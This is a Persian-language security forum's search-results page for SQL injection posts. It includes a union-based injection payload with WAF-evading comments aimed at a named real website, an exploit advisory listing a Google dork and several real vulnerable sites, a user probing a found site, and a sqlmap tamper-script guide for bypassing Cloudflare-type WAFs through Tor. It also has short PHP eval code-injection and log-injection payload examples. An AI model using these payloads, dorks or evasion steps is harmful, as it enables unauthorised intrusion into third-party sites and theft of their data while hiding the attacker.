رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'sql injection'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • تالار اصلی سایت
    • قوانین سایت
    • آسیب پذیری های کشف و گزارش شده
    • رقابت های فتح پرچم ( CTF )
    • بخش سوال و جواب های عمومی
  • بخش تست نفوذ پذیری
    • اخبار دنیای امنیت
    • باگ بانتی (Bug Bounty)
    • ابزارهای امنیتی و آنالیز سیستم ها
    • ویدیو های آموزشی آزمایشگاه امنیت
    • تحلیل و بررسی آسیب پذیری های سایت و سرورها
    • امنیت سیستم های شخصی
    • امنیت شبکه های وایرلس
    • ابزار و اسکریپت های امنیتی
    • Vulnerability Laboratory
  • بخش مدیریت شبکه
    • امنیت شبکه و سرور (Network Security)
    • آموزش های سرورهای ویندوز (Windows Server)
    • مدیریت شبکه
    • مجازی سازی
    • کشف جرائم رایانه ای (Forensics)
    • Library
  • بخش برنامه نویسی و کامپیوتر
    • کامپیوتر
    • برنامه نویسی تحت وب
    • برنامه نویسی تحت دسکتاپ
    • سیستم عامل
  • بخش کرک (Crack)

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me


Name


Telegram


Instagram


Main os


Twitter


Skype

10 نتیجه پیدا شد

  1. Alpha

    Error Based Sql injection

    آموزش SQL injection به روش Error Based سوال بود در خدمتم موفق باشيد error_based.rar
  2. سلام من یک سایت پیدا کردم که باگ sql injection احساس می کنم داره . حالا از کجا این حرفو میزنم؟ خوب این آدرسه این صفحه از سایت هست: target.com/news_more.php?id=23 حالا وقتی من یک ' انتهای آدرس سایت میذارم این پیغامو به من میده: Fatal _error_: Uncaught _error_: Call to a member function fetch_assoc() on boolean in /home2/rakum0091/public_html/news_more.php:94 Stack trace: #0 {main} thrown in /home2/rakum0091/public_html/news_more.php on line 94 حالا به نظرتون ایراد کار از کجاست؟
  3. Skaller

    اموزش هک سایت با Havij

    با سلام خدمت دوستان عزیز در این فیلم اموزشی هک سایت با هویج رو به شما اموزش میدم لینک دانلود : http://uplod.ir/3qj4bfkhfrk8/hacking_site_via_Havij.rar.htm
  4. root3r

    آموزش های قدم به قدم Sql Injection

    با سلام خدمت همه دوستان و عزیزان با توجه به اینکه بخش Database Hacking خالیست و آموزش های مفیدی در آن نیست با مدیران تصمیم گرفتیم پست های غیر مفید را حذف و آموزش های مفید قرار بدیم ! باتوجه به عنوان آموزش ها به صورت کوتاه و قدم به قدم است و به اینصورت بهتر میتونیم بهتر Sql Injection درک کنیم ! از Promis جان و دیگر دوستان که در این بخش کمک کردند , متشکرم ! قوانین : 1- از اسپم به شدت بپردازید . 2-سوالات خود را در بخش Q/A مطرح کنید . 3- از کپی کردن از سایت های دیگر به شدت خوداری کنید نکته : سعی کنید آموزش ها تا حد امکان ساده باشد و بصورت ویدئویی باشد .
  5. alimoradi

    مشکل در اینجکت کردن تارگت

    سلام در اینجکت کردن این تارگت به مشکل برخوردم ممنون میشم ادامه اینجکت رو راهنمایی کنید. http://mlavie.ca/evenement.php?primaire=-1519677164+/*!50000union*/+/*!50000select*/+1,/*!50000GrOuP_CoNcAT(table_name)*/,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+/*!50000inforMAtion_schema*/.tables+/*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+ تا بابیپس تیبل ها پیش میرم ولی تیبل ها رو نمایش نمیده چجوری باید بایپس بشه ؟
  6. معرفی در فرایند اسکن توسط SQLMAP ممکن است هشداری مبنی بر این که وب سایت هدف شما با استفاده از فایروال (Web Application (WAF مانند Cloudflare محافظت می شود روبرو شوید ، سیستم های پیشگیری از نفوذ (IPS)، سیستم تشخیص نفوذ (IDS) و ... ممکن است به طور فزاینده ای تزریق (SQL (SQLi و موفقیت های شما را به چالش بکشند . هنگامی که هدف های مورد نظر شما WAF را اجرا می کنند ، تزریقات معمول SQL و اسکریپت های عادی برای تلاش های بهره برداری از امنیت برنامه های وب بی تاثیر است . خوشبختانه SQLMAP دارای یک ویژگی برچسب "tamper script" است که شما را قادر می سازد تا بررسی کنید آیا سایت آسیب پذیر است و آسیب پذیری SQLi دارد یا خیر و به طور بالقوه امضاهای WAF را می تواند دور بزند (Bypass) انواع متد ها : نکته 1: SQLMAP یک ابزار بسیار موثر است که باید فقط برای اهداف آزمایش نفوذ استفاده شود. حتی یک مبتدی که از SQLMAP استفاده می کند می تواند تاثیرات مخربی روی سیستم هدف داشته باشد . این ابزار پرسشهای متعددی را تولید می کند که ممکن است به طور قابل ملاحظه ای در پایگاه داده هدف تاثیر بگذارد. برای حداکثر اثربخشی این ابزار، توصیه می شود قبل از استفاده از SQLi به طور کامل شناخت داشته باشید. بنابراین، بهتر است که SQLMap را در سیستم هایی که تنها برای آزمایشات مورد استفاده قرار می گیرند، بکار ببرید . 1 . بررسی (شناسایی) WAF وب سایت که محافظت از برنامه وب را بر عهده دارد Sqlmap –u <Target….?id=0> --identify-waf –tamper=”between,randomcase,space2comment” –v 3 –random-agent برای بررسی اینکه آیا سایت هدف از WAF Cloudflare استفاده می کند ، ModSecurity یا بعضی از WAF های شناخته شده مانند Sucuri / Incapsula / F5 ، از گزینه زیر در SQLMAP استفاده کنید : –identity-waf OR –check-waf از "- = thread =" استفاده نکنید که بزرگتر از 1 باشد ، زیرا ممکن است به 403 Error Forbidden منجر شود که نشان می دهد آدرس IP شما ممنوع (banned) شده است از این رو، بهتر است که از پروکسی ها برای رسیدن به هدف و نفوذ به سایت استفاده کنیم نکته 2: اگر قبلا SQLMAP را دانلود نکرده اید، می توانید این کار را از سایت رسمی گیت هاب انجام دهید. نکته 3: مشاهده بیش از حد بسیاری از کدهای خطای 4xx / 5xx HTTP ممکن است نشان دهد که WAF در محیط برنامه وب مورد استفاده قرار می گیرد به یاد داشته همیشه می توانید دوباره اسکن کنید 2 .لازم است که در این مرحله از پروکسی ها استفاده کنید و به طور معمول از پروکسی های Tor استفاده می شود اما به طور مستقل نمیتوانم در هر زمانی اتصال به سرور های پروکسی را تایید کنم بنابراین شخص نفوذگر خود باید شخصا چاره ایی برای این کار پیدا کند یا از پروکسی های دیگر استفاده کند اما در اینجا یک اموزش کوتاه برای کمک به ناشناس بودن را ارائه میکنم بنابراین از گزینه های زیر در SQLMAP استفاده کنید : –tor (Tor will be enabled as SQLMAP will attempt to apply the Tor proxy settings automatically.) –tor-port (Apply Tor proxy manually) –tor-type (Apply Tor proxy manually) 3. فعال کردن عامل تصادفی از گزینه زیر برای عامل تصادفی استفاده کنید : –random-agent برای بررسی اینکه آیا Tor به درستی با SQLMAP کار می کند، از گزینه زیر استفاده کنید : –check-tor 4. پیدا کردن اسکریپت پایتون در دایرکتوری SQLMAP: به دایرکتوری SQLMAP بروید. یک دایرکتوری با نام "tamper" که دارای اسکریپت های پایتون است که می توانید استفاده کنید. اسکریپت های جانبی پایتون : گرفتن اسکریپت های بیشتری از پایتون برای استفاده با گزینه SQLMAP Tamper از اینجا . 5. طریقه استفاده راحت از اسکریپت پایتون SQLMAP : استقرار اسکریپت tamper بسیار آسان است : python sqlmap.py <options> --tamper="<script-name>.py" مثال های SQLMAP Tamper Script : به عنوان مثال، از لحاظ MSSQL، MySQL، و تست نفوذ معمولی - شما می توانید از اسکریپت های تروجان زیر استفاده کنید : between randomcase space2comment charunicodeencode (Discussed further in NOTE 4) percentage (Discussed further in NOTE 4) برای MySQL، می توانید اسکریپت های تروجان زیر را اعمال کنید : space2hash space2mysqlblank charunicodeencode (Discussed further in NOTE 4) percentage (Discussed further in NOTE 4) نکته 4: برای مخفی کردن پیلود های معکوس در ASP و ASP.NET، از اسکریپت های زیر استفاده کنید: charunicodeencode percentage نمونه کامندهای SQLMAP Tamper Script : پس از تایید اینکه سایت هدف توسط WAF مانند Cloudflare محافظت می شود، می توانید از یکی از دو دستور زیر استفاده کنید : python sqlmap.py -u "https://www.thetargetdomain/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor python sqlmap.py -u "https://www.thetargetdomain/" --check-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor نتیجه البته، این آموزش SQLMAP صرفا محدود به دور زدن محافظت Cloudflare WAF نیست، بلکه برای دیگر راه حل های امنیتی نیز کاربرد دارد. این ابزار می تواند حداکثر توانایی خود را در دست یک تست نفوذ کننده حرفه ای با دانش گسترده SQLi و امنیت نرم افزار به دست آورد . حتی یک مبتدی می تواند از این ابزار برای ایجاد اثرات قابل توجه استفاده کند. شاید مهمترین مسئله که در ذهن داشته باشیم ، ذهنیت تست نفوذ است اگر در تست نفوذ شکست خوردید یا به مشکلاتی برخورد کردید تلاش خود را از دست ندهید ( کپی با ذکر منبع )
  7. Mkali07

    Injection Python

    با سلام گفتم یه تاپیکت جدید باز بشه تا اسپم نشه که البته آموزش هایی هم در اینجا قرار خواهد گرفت با ارتباط همین موضوع جا داره یه توضیح کوتاه بدم در مورد تارگتی که دوستمون قرار دادند تا دوستان به اشتباه نیافتند در مورد اینکه در کد نویسی این تارگت اشتباهاتی رخ داده شکی نیست اما در این نوع تارگتی که قرار گرفت sql injection وجود ندارد به دلیل اینکه کوئری که وارد میکنید هیچ تاثیری نداره و فقط و فقط از شما int میگیره و اگر string وارد کنید بصورت خنثی دریافت میکنه جوری که مثلا print "string" زده شده ایشالله در اینده آموزش sql injection در همچین فریم ورک هایی قرار خواهد گرفت موفق باشید
  8. rajaz

    2x Ajans Sql Injection

    |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: 2X Ajans SQL injection |[+] |[+] Exploit Author: Iran Cyber Security Group |[+] Discovered By: r4j4z |[+] Vendor Homepage: http://www.2xajans.com |[+] Tested on : Windows |[+] Google Dork: intext:Design by 2X Ajans inurl:id= |[+] Home: iran-cyber.org |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://ustungucaktarma.com/urunler.php?id=9%27 |[+] |[+] http://www.gazibant.com/urunler.php?id=6%27 |[+] |[+] http://usgmadencilik.com/urun-detay.php?id=2%27 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| https://cxsecurity.com/issue/WLB-2018040110
  9. سلام خدمت تمامی دوستان با یکی دیگه از آموزش های بررسی مختصر و مفید آسیب پذیری های تحت وب در خدمت شما هستیم ../ خب توی این تاپیک قصد داریم Code Injection رو توضیح بدیم ../ توی یک جمله مختصر و مفید میشه معرفیش کرد : آسیب پذیری که توسز اون میتونید Code های خودتون رو اجرا کنید ( اینجا منظور کد PHP ) ../ خب برای درک بهتر نمونه کدی ببینیم : $variable_id = "varid"; $x = $_GET['id']; eval("\$varid = \$x;"); خب اینجا کسی اگه یکم دقت کنه میتونه ببینه که از eval استفاده شده و راحت میشه کد PHP دلخواه رو اجرا کرد ../ خب مثال میزنیم ... اگه پارامتر ورودی id رو قرار بدیم : file.php?id=1; phpinfo() راحت میشه phpinfo رو دید و به راحتی میشه Code Injection رو انجام داد ../ امیدوارم مورد قبول واقع شده باشه، موفق باشید
  10. سلام دوستان امروز میخوایم آسیب پذیری Log Injection رو به شما معرفی میکنیم ../ این آسیب پذیری به شما کمک میکنه که بتونید لاگی که خودتون دوست دارید رو توی لاگ بریزید ../ نمونه ای از این آسیب پذیری رو ببینید : String val = request.getParameter("val"); try { int value = Integer.parseInt(val); } catch (NumberFormatException) { log.info("Failed to parse val = " + val); } خب میبینید که اینجا صفحه پارامتد ورودی val رو میگیره و اگه عددی بود اون رو توی value میریزه و اگه نبود توی فایل لاگ متنی به این صورت قرار میده : INFO: Failed to parse val = (MATN) خب حالا شما به راحتی میتونید val رو هر چیزی بخواید بزارید و در لاگ قرار بدید ../ برای نمونه اگه پارامتر ورودی val رو با مقدار test%0a%0aINFO:+User+logged+out%3dc10n3r ارسال کنید اون موقع توی لاگ این قطعه قرار داده میشه : INFO: Failed to parse val=test INFO: User logged out=c10n3r موفق باشید

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...